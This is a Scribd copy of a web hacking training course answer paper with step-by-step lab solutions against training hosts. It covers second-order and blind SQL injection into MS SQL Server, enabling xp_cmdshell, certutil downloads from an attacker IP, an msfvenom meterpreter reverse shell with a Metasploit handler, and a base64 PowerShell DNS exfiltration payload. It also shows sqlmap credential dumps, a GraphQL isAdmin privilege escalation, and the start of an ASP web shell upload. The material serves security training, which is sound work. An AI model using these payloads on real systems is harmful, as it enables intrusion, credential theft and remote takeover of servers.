Scribd
Upload
15 views

AnswerSheet Part3

The document is a detailed answer paper for an Advanced Web Hacking training course, covering various modules including SQL Injection techniques, file uploads, and Server Side Request Forgery (SSRF). It provides step-by-step solutions to challenges related to SQL injection, including second-order SQL injection, data exfiltration, and obtaining a reverse shell. Each section outlines specific methods and payloads used to exploit vulnerabilities in web applications, particularly those built on .NET and SQL Server.

Uploaded by

Minh Tuấn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views

AnswerSheet Part3

The document is a detailed answer paper for an Advanced Web Hacking training course, covering various modules including SQL Injection techniques, file uploads, and Server Side Request Forgery (SSRF). It provides step-by-step solutions to challenges related to SQL injection, including second-order SQL injection, data exfiltration, and obtaining a reverse shell. Each section outlines specific methods and payloads used to exploit vulnerabilities in web applications, particularly those built on .NET and SQL Server.

Uploaded by

Minh Tuấn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 100

||||||||||||||||||||

Advanced Web Hacking (Part 3)

Answer
Paper
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Contents
Module: SQL Injection Masterclass .................................................................................... 2

Second Order SQL Injection ......................................................................................... 2

SQLi Through Crypto - OOB ....................................................................................... 10

SQL Injection to Reverse Shell.................................................................................... 17

Second-order SQL Injection on Joomla ....................................................................... 22

Advance SQLMAP Usage with eval option .................................................................. 32

Data Exfiltration over DNS via SQLi ............................................................................ 39

GraphQL Exploitation .................................................................................................. 46

Module: Tricky file uploads ............................................................................................... 61

Bypassing File Validations #1 ..................................................................................... 61

Bypassing File Validations #2 ..................................................................................... 67

SQLi via File Metadata ................................................................................................ 72

Module: Server Side Request Forgery (SSRF) ................................................................. 80

SSRF To Check Open Ports and Fetch File ................................................................ 80

SSRF via PDF Generation .......................................................................................... 96

Page: | 1

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: SQL Injection


Masterclass

Second Order SQL Injection


Challenge URL: http://topup.webhacklab.com/Account/SecurityQuestion

• Identify a Second order injection using your account.


• Exploit the injection to extract the name of the user running the service.

Solution:
Step 1: Create an account in the topup application, setup a secret question in profile, logout of the
application and navigate to the password reset functionality.

Choose the method ‘Answer Secret Questions’ and provide the account email address. Notice that
the application displays the security question set previously.

Page: | 2

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Notice that the application is developed in .NET with MVC framework. Hence, we can
assume that the possibility of MS-SQL Server as a backend database is more.

Step 3: Login into the application again and inject the payload “' waitfor delay '0:0:10' --” into the
Question, as shown below:

Page: | 3

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Logout and visit the password reset functionality as done earlier. Input and answer and click
on “RESET PASSWORD”.

Step 5: Capture the request in Burp and let’s observe the request using Burp Repeater as we have
injected time delay payload(Generally we can check delay - response time either using Burp
Repeater or Burp Intruder). The application will respond after approximately 10 seconds.

Page: | 4

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: The previous step confirms the presence of a second order SQL injection. Start tcpdump on
your kali VM to dump dns requests, using the following command:

root@Kali:~# sudo tcpdump -vvv -n port 53 -i any

Repeating the previous steps inject and execute the following payload to check if OOB calls can be
made using xp_dirtree:

';exec master..xp_dirtree '\\userX.webhacklab.com\' --

Note: Each time you try this, add a different, random subdomain name before the domain
“userX.webhacklab.com” (e.g. randomaaaaaa.userX.webhacklab.com)

Step 7: Output of tcpdump will show that the DNS requests are being received by the host.

Page: | 5

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Again run tcpdump to dump dns requests, using the following command:

root@Kali:~# sudo tcpdump -vvv -n port 53 -i any

Again repeating the previous steps inject and execute the following payload to execute database
command and get the database system username over OOB channel:

'; DECLARE @data varchar(1024); SELECT @data = (SELECT SYSTEM_USER);


EXEC('master..xp_dirtree "\\'+@data+'.userX.webhacklab.com\foo$"'); --

Step 9: Tcpdump will show that the dns requests are being received by the host with the subdomain
as the response to the SQL query ‘SELECT SYSTEM_USER’.

Page: | 6

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Repeating the previous steps inject and execute the following payload to check if the
current user has sysadmin privilege:

'; DECLARE @data varchar(1024); SELECT @data = (SELECT


IS_SRVROLEMEMBER('sysadmin')); EXEC('master..xp_dirtree
"\\'+@data+'.userX.webhacklab.com\foo$"'); --

Step 11: Tcpdump will show that the dns requests are being received by the host confirming that the
current user has sysadmin privileges.

Page: | 7

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 12: Repeating the same steps inject and execute the following payload to enable xp_cmdshell
(disabled by default):

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure


'xp_cmdshell', 1;RECONFIGURE; --

Step 13: Assuming that our last payload worked and enabled xp_cmdshell, inject the following
payload to extract the username:

';exec master..xp_cmdshell 'cmd.exe /c certutil -urlcache -split -f


http://192.168.4.X:8000/%username%' --

On your kali machine start a python web server using the following command:

root@Kali:~# python3 -m http.server

Page: | 8

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 14: Execute the payload using the password reset functionality.

Step 15: Once we execute the payload using the above step, python server should receive a
request containing the username.

Page: | 9

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

SQLi Through Crypto - OOB


Challenge URL: http://topup.webhacklab.com/Shop/Order

• Identify a data encryption endpoint using your registered account.


• Utilize the knowledge of encryption endpoint to confirm SQL injection using an OOB
channel.

Solution:
Step 1: Navigate to the recharge functionality of the topup application. Provide a voucher code and
Intercept the request using Burp Proxy.

Page: | 10

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Send the same request to Burp Repeater. Notice that the application sends a request to the
server and gets back an encrypted value of the voucher code.

Page: | 11

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Repeat Step 1 with the value of the voucher code being the payload

' waitfor delay '0:0:10' –

Page: | 12

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Observe the change in the encrypted value of the voucher code. (Notice that the application
is developed in .NET with MVC framework. Hence, we can assume that the possibility of SQL
Server as a backend database is more)

Step 5: Fill in the other details of the recharge page and submit the request. After completing the
payment process, the application sends a link to the registered email address. Opening that link will
show the details of the order. Notice that this link has a similar encrypted value for the parameter
“Transactionid”.

Page: | 13

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: The figure shows that the application sends two consecutive requests when we access
“Order Confirmation” URL from mail as stated in the above step. Send the highlighted request
“/api/order?Transactionid=<transaction_id>” to Burp repeater:

Step 7: Change the value of the parameter “Transactionid” to the payload generated in Step 3.
Notice that the third-party application sends a response after a delay of approximately 10 seconds
as defined in the payload.

Note: Repeating these steps with different sleep time value can confirm the presence of SQL
injection in the payment gateway.

Page: | 14

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Continuing with the last step, let’s exploit this further to retrieve the data using an out-of-
band(OOB) channel - DNS. We already identified the application is developed in .NET with MVC
framework, backend database is SQL Server. So, operating system could be Windows. Start a DNS
listener on your kali VM using the following command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 9: As xp_cmdshell was enabled in earlier exercise we can use it. We can enable it using the
following command:

';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure


'xp_cmdshell', 1;RECONFIGURE; --

Enter the payload

';exec master..xp_cmdshell 'cmd.exe /c nslookup userX.webhacklab.com' –

in the parameter ‘code’ and submit the request, the response will have the encrypted form of the
payload.

Page: | 15

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: When we submit this encrypted payload through the “Transactionid” parameter, the inbuilt
MySQL function “xp_cmdshell” would trigger the command “cmd.exe /c nslookup
userX.webhacklab.com” on the host and send a request to resolve google.com to our host.

Step 11: We will receive requests to resolve “userX.webhacklab.com” on our host confirming that
our payload executed successfully on the host.

Page: | 16

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

SQL Injection to Reverse Shell


Challenge URL: http://topup.webhacklab.com/api/voucher

• Continue with previous exercise to obtain a reverse shell on the DB host using
Metasploit and native Windows tools (powershell, certutil, cscript etc.).

Solution:
Step 1: Continuing with the last exercise, let’s exploit this further to get a reverse shell using
Inferential/blind SQL Injection. We already identified the application is developed in .NET with MVC
framework, backend database is SQL Server and operating system is Windows. Generate a payload
using msfvenom using the following command:

root@kali:~/tools# msfvenom -p windows/x64/meterpreter_reverse_http


LHOST=192.168.4.X LPORT=<PORT> -f exe > userX.exe

Step 2: Host the generated payload using python web server on the attacker box:

root@kali:~# python3 -m http.server

Page: | 17

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Navigate to the topup functionality of the application, and as shown in earlier exercise inject
the following payload into the parameter code and send the request:

';exec master..xp_cmdshell 'cmd.exe /c certutil -urlcache -split -f


http://192.168.4.X:8000/userX.exe c:\windows\temp\userX.exe' --

Step 4: As we did in previous exercises, use the encrypted payload and inject in the “Transactionid”
parameter of the order request to execute the payload.

Page: | 18

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: The python server should receive a request from the victim host, as shown below:

Step 6: Stop the python server and start a metasploit handler using the following commands:

root@Kali:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter_reverse_http

msf exploit(handler) > set LHOST 192.168.4.X

msf exploit(handler) > set LPORT <PORT>

msf exploit(handler) > run

Page: | 19

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Navigate to the topup functionality of the application, send the following payload in the apply
coupon feature and send the request to generate the encrypted payload. Enter the encrypted
payload received in the vulnerable parameter as seen in the previous exercise.

';exec master..xp_cmdshell 'cmd.exe /c c:\windows\temp\userX.exe' --

Step 8: Use the encrypted payload and inject in the “Transactionid” parameter of the order request
to execute the payload.

Page: | 20

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: You should receive a meterpreter session in your metasploit session, as shown below:

Page: | 21

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Second-order SQL Injection on Joomla


Challenge URL: http://cms.webhacklab.com:81/administrator/index.php

• Identify and exploit second order SQL Injection point in Joomla Instance
• Fetch the databases from database server

Solution:
Step 1: Login to the application using user with manager privilege:

Step 2: Navigate to User’s profile edit page:

Page: | 22

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Save the profile and intercept the request in BURP proxy and send this request to Burp
repeater:

Step 4: Insert single quote (‘) into value of parameter “jform[params][admin_style]” and forward the
request:

Page: | 23

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Payload stored in database but it did not throw any error back:

Step 6: Navigate to “http://cms.webhacklab.com:81/administrator/index.php” URL (2nd order SQL


injection) which will show SQL error message:

Page: | 24

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Insert 'nsstest' payload and click on send button:

Step 8: Error on second order page shows only 1st character “n” of payload “nsstest”:

Page: | 25

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: To confirm, insert “AND sleep(5);--” payload and click on send button:

Step 10: Error on second order page still shows 1st character “A” of the payload which indicates an
array and the 0th index of it is being stored in database:

Page: | 26

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Insert the payload to 0th index of array parameter “jform[params][admin_style][0]” and click
on send button:

Step 12: Error on second order page reflects full payload now:

Page: | 27

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Insert payload “extractvalue(0x0a,concat(0x0a,(select database())))” and click on send


button to get the current database:

Step 14: Error on second order page reflects current database “joomla”:

Page: | 28

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 15: To automate the exploitation, provide payload insertion mark “*” to crafted request so
SQLmap can easily insert the payloads which will get executed:

extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 *)))

Page: | 29

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 16: Run Sqlmap tool on the request with “--second-url” switch provided with error page URL:

root@Kali:~# sqlmap -r request.txt --dbms MySQL --second-url


"http://cms.webhacklab.com:81/administrator/index.php" --dbs

Page: | 30

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 17: Sqlmap extracts all database names:

Page: | 31

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Advance SQLMAP Usage with eval option


Challenge URL: http://topup.webhacklab.com/api/Product/GetProduct?pid=&sig=

• Identify SQL Injection point


• Fetch the databases from the database server

Solution:
Step 1: Login to the application and navigate to the Topup and click on the “Three” option, as shown
below:

Page: | 32

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Click on the ORDER button as shown in the figure below.

Step 3: Observe the request in Burp suite and send the selected request to Burp suite repeater tab.

Page: | 33

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Observe the request and response as shown below:

Step 5: Modify the parameter pid which returns a 500 error.

Page: | 34

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Observe the view source of the web page shown in Step 3 which shows the source code
used to generate the “sig” parameter with the static key used for encryption purposes.

Step 7: To dynamically generate the sig parameter for the request parameter using the following
python code.

import hmac;

import hashlib;

import base64;

key="9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja";

message="http://topup.webhacklab.com/api/Product/GetProduct?pid=2123 and 1=1";

sig=hmac.new(key, message, digestmod=hashlib.sha256).hexdigest().upper();

print sig;

Step 8: Generate the “sig” parameter for the modified request shown in Step 5.

Page: | 35

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Replace the signature and send the request which will respond with 200 OK.

Step 10: Inserting a boolean based sql payload with “and” query and using the new signature
created by following Step 8 for the new pid will return null.

Page: | 36

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Inserting boolean SQL payload with “or” query and using the new signature created by
following Step 8 for the new pid will result in data.

Step 12: In order to run SQLmap, save the request in the “request.txt” file with the vulnerable
parameter is “*”. In our case it is code parameter which is vulnerable.

Page: | 37

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Mention the eval tag which will dynamically generate the sig parameter for every sqlmap
request.

root@Kali:~# sqlmap -r request.txt --eval='import hashlib;import


hmac;sig=(hmac.new("9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja",
"http://topup.webhacklab.com/api/Product/GetProduct?pid=%s" % (pid),
hashlib.sha256)).hexdigest().upper();' --dbs –batch

In case of UTF encoding error try following command:

sqlmap -r eval.txt --eval='import hmac;import hashlib;import base64;sig =


hmac.new("9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja".encode("utf-8"),
("http://topup.webhacklab.com/api/Product/GetProduct?pid=%s" %
(pid)).encode("utf-8"), digestmod=hashlib.sha256).hexdigest().upper()' --dbs -
-batch

Step 14: We will be able to fetch all the database names from the DB server.

Page: | 38

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Data Exfiltration over DNS via SQLi


Challenge URL: http://topup.webhacklab.com/Account/SecurityQuestion

• Exploit the injection vulnerability to exfiltrate the output of command “ipconfig” over
DNS channel.

Solution:
Step 1: It can be identified that the application is developed in .NET with MVC framework, backend
database is SQL Server and it is vulnerable to SQL injection. Exploit this further to retrieve the data
using out-of-band (OOB) channels - DNS. Start a DNS listener on your kali VM using the following
command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 2: Enable xp_cmdshell using the following command.

';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure


'xp_cmdshell', 1;RECONFIGURE; --

Page: | 39

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Login into the application and inject the below payload into the Question field, as shown
below:

';exec master..xp_cmdshell 'cmd.exe /c nslookup XXX.userX.webhacklab.com' --

Step 4: Next, logout and visit the Password Reset functionality as done in the earlier exercise. Input
the answer and click on ‘RESET PASSWORD’.

Page: | 40

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Note the output of ‘tcpdump’. It will show that the DNS requests are being received by the
host.

Step 6: As there is a limit on size and type of data that can be sent over DNS channels, we need to
create a payload that will encode the output, break it into chunks and then send it over the DNS
channel with sequence numbers appended to them.

Once the OOB calls are received, the output can be sorted with the help of sequence numbers as
UDP packets do not have an arrival order.

The payload created is as shown below. It will send output of ipconfig over DNS to
userX.webhacklab.com.

'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > C:\Windows\Temp\outputX &&


certutil -encodehex -f C:\Windows\Temp\outputX C:\Windows\Temp\outputX.hex 4
&& powershell -enc
JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAF
QAZQBtAHAAXABvAHUAdABwAHUAdAAxADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAk
AHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQ
A7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQA
ZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAG
YAaQBsAGUALgB1AHMAZQByADEAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABq
ACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQ
BuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA=="' --

Let’s understand the payload in parts:

First part: Below command will run ipconfig on SQL server using xp_cmdshell, write the output
to a file, then hexencode it with ‘certutil’ in a specific format (in columns with spaces, without the
characters and the addresses), and is represented by code 4.

Page: | 41

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

exec master..xp_cmdshell 'cmd /v /c "ipconfig > C:\Windows\Temp\outputX &&


certutil -encodehex -f C:\Windows\Temp\outputX C:\Windows\Temp\outputX.hex 4

Second part: It will run a PowerShell script in Base64 encoded format to avoid breaking SQL
syntax. This script will read the hex encoded output file, break the content into chunks and then
generate DNS queries in specific format i.e.
sequence_number.$Data.file.userX.webhacklab.com

Plain Script:

$text=Get-Content C:\Windows\Temp\outputX.hex;$subdomain=$text.replace("
","");$j=11111;foreach($i in $subdomain){
$final=$j.tostring()+"."+$i+".file.userX.webhacklab.com";$j += 1; Start-
Process -NoNewWindow nslookup $final }

This will be the Encoded Script that can be decrypted using:

powershell -enc {$encoded_script} :

The encoded output of the plaintext script will look like this :

JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAF
QAZQBtAHAAXABvAHUAdABwAHUAdAAxADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAk
AHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQ
A7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQA
ZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAG
YAaQBsAGUALgB1AHMAZQByADEAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABq
ACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQ
BuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA==

Page: | 42

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: To create your own encoded string containing your IP address and file name use the
PowerShell encoder here or use our utility hosted within the VPN http://utility.webhacklab.com as
shown in the screenshot below.

Step 8: Submit the final payload to the injection point.

Page: | 43

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Before executing the payload run Tcpdump to capture the DNS queries and write it to a file,
as shown in the below figure:

root@Kali:~# tcpdump -n udp port 53 -i any | tee oob.txt

Step 10: As done earlier, execute the payload from reset password and observe the responses on
tcpdump.

Page: | 44

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Once the execution completes, oob.txt will be created. Run the following command that will
extract required data from the file, arrange it based on sequence number, and then hex decode it.

root@Kali:~# egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' oob.txt|sort -u|cut -d.


-f2|xxd -r -p

Page: | 45

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

GraphQL Exploitation
Challenge URL: http://expense.webhacklab.com:3000/viewexpense

• Exploit SQL injection in one of the GraphQL endpoints and retrieve admin credentials.
• Use Introspection to extract the PII (Salary) of the ‘[email protected]’.
• Using GraphQL mutation, view expenses of all the users.

Part 1: Exploit SQL injection in one of the GraphQL endpoints and


retrieve admin credentials.

Solution:
Step 1: Navigate to ' http://expense.webhacklab.com:3000/ ' and register an account. Enter
credentials and click on 'Sign In'.

Step 2: Click on ‘AddExpense’ and fill in any random expense.

Page: | 46

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: The expense will be added. Now click on ‘ViewExpense’ as shown:

Step 4: Analyze the HTTP Request content. The request shows the expenses for a particular date.

Page: | 47

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Change the date field value to blank/null and observe the response.

Step 6: Change the date field value to “ 07-15-2020' “ and send the request. If you observe we have
added a single quote at the end of the date.

Page: | 48

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: There is a chance the 'date' variable in HTTP Request is vulnerable to SQL Injection. Let’s
add an ‘*’ at the date parameter and save the request for sqlmap:

Page: | 49

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Run the following sqlmap commands and capture the admin credentials as shown in the
figure:

root@Kali:~# sqlmap -r graphql.txt –dbs

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' –tables

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' -T users

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' -T users -C


email,salary,address,mobile,password --dump

Step 9: On completion of sqlmap credentials of all the users are visible in the output.

Page: | 50

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Part 2: Use Introspection to extract the PII (Salary) of the


[email protected]’.

Solution:
Step 1: Navigate to 'http://expense.webhacklab.com:3000/login', enter credentials and click on 'Sign
In'.

Step 2: Click on ‘ViewExpense’ as shown:

Page: | 51

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Capture the Request in Burp Suite and send this to the Burp Repeater.

Page: | 52

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Create an Introspection query to fetch schema information and send it to the GraphQL
endpoint.

Introspection Query:

{"query":"{__schema{types{name,fields{name}}}}"}

After analyzing the Introspection results, observe that the GraphQL endpoint has a query named
'users' which takes an argument called 'ID' as shown in Figure:

Page: | 53

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: After analyzing the users query result, observe that sensitive information of the user like
'salary', 'address', 'mobile number' based on supplied ID was returned, as shown in Figure:

Step 6: Now craft a GraphQL query to fetch user information based on ID value as shown in Figure:

GraphQL Query:

{"query":"query ($id: ID!){\n users (id:


$id){id\nfirstname\nlastname\nemail\nmobile\naddress\nsalary}\n
}","variables":{"id":"1"}}

Page: | 54

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: In order to fetch information of a user with id as '9' simply replace '1' with value '9' as shown
in figure and you can fetch the salary information of that user.

Page: | 55

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Part 3: Using GraphQL mutation, view expenses of all the users.

Solution:
Step 1: Navigate to 'http://expense.webhacklab.com:3000/login', enter credentials and click on 'Sign
In'.

Step 2: Capture the login request and send it to the Burp Repeater.

Page: | 56

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Capture and decode the Base64 JWT token from the HTTP response and observe that the
user role is ‘isAdmin=false’.

Step 4: Navigate to the ‘ViewExpense’ page and observe that you can view the expenses added by
you

Page: | 57

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Create an Introspection query to fetch GraphQL schema information and send it to the
GraphQL endpoint.

Introspection Query:
{"query":"{__schema{types{name,fields{name}}}}"}

After analysing the HTTP Response of the Introspection query, it can be observed that the GraphQL
endpoint will have mutations named ‘addExpense’ and ‘updateUser’

Step 6: To fetch mutation schema information, send the below mutation query to the GraphQL
endpoint.

Introspection Mutation Query:


{"query":"{__schema{mutationType{name,fields{name,args{name}}}}}"}

Page: | 58

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Note: After analyzing the ‘updateUser’ mutation information in HTTP Response, it can be observed
that the user information like 'firstname', 'salary', 'address', 'mobile number' and user role
'isAdmin'can be updated.
Step 7: Craft a GraphQL query to update user role ‘isAdmin=True’ value as shown in Figure:

GraphQL Query:

{"query":"mutation{\n updateUser(firstname: \"user\", lastname: \"updated\",


mobile: \"0000000000\", address: \"AWH\", salary: \"2500\", isAdmin: true){\n
isAdmin\n }\n}"}

Step 8: Logout and login again with the same user.

Page: | 59

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Capture and decode the Base64 JWT token from the HTTP response and observe that the
user role is ‘isAdmin=true’

Step 10: Navigate to ‘ViewExpense’ and observe that you can view the expenses of all the users.

Page: | 60

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Tricky file uploads

Bypassing File Validations #1


Challenge URL: http://topup.webhacklab.com/Account/Profile

• Identify the upload functionality and abuse it to upload a web shell.

Solution:
Step 1: Login into the topup application and navigate to the profile update page. The profile update
page allows the user to upload a profile picture.

Upload an image and the application displays the image in your profile.

Page: | 61

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: The application being developed in ASP.NET, try to upload an ASP file (test.asp) with the
following content.

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
